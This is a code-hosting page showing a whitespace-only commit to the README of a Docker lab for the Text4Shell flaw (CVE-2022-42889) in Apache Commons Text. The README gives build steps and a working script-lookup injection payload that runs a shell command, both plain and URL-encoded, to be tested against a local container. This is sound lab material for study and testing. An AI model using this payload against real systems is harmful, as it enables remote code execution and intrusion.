crash.software
Projects
Pull Requests
Issues
Builds
cve-2022-42889-text4shell-docker
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY cve-2022-42889-text4shell-docker Commits 288959ed
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 4 lines
    5 5  1. Maven install to create the fat jar
    6 6   
    7 7  ```
    8  - mvn clean install
     8 +mvn clean install
    9 9  ```
    10 10   
    11 11  2. Docker build
    12 12   
    13 13  ```
    14  - docker build --tag=text4shell .
     14 +docker build --tag=text4shell .
    15 15  ```
    16 16   
    17 17  3. Docker run
    18 18   
    19 19  ```
    20  - docker run -p 80:8080 text4shell
     20 +docker run -p 80:8080 text4shell
    21 21  ```
    22 22   
    23 23  4. Test the app
    24 24   
    25 25  ```
    26  - http://localhost/text4shell/attack?search=<anything>
     26 +http://localhost/text4shell/attack?search=<anything>
    27 27  ```
    28 28   
    29 29  5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
    30 30   
    31 31  ```
    32  - ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
     32 +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
    33 33  ```
    34 34   
    35  - http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
     35 +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
    36 36   
    37 37  6. You can also try using `dns` or `url` prefixes.
    38 38   
    39 39  7. Get the container id
    40 40   
    41 41  ```
    42  - docker container ls
     42 +docker container ls
    43 43  ```
    44 44   
    45 45  8. Get into the app
    46 46   
    47 47  ```
    48  - docker exec -it <container_id> bash
     48 +docker exec -it <container_id> bash
    49 49  ```
    50 50   
    51 51  9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
    52 52   
    53 53  ```
    54  - ls /tmp/
     54 +ls /tmp/
    55 55  ```
    56 56   
    57 57  10. To stop the container
    58 58   
    59 59  ```
    60  - docker container stop <container_id>
     60 +docker container stop <container_id>
    61 61  ```
Please wait...
Page is in error, reload to recover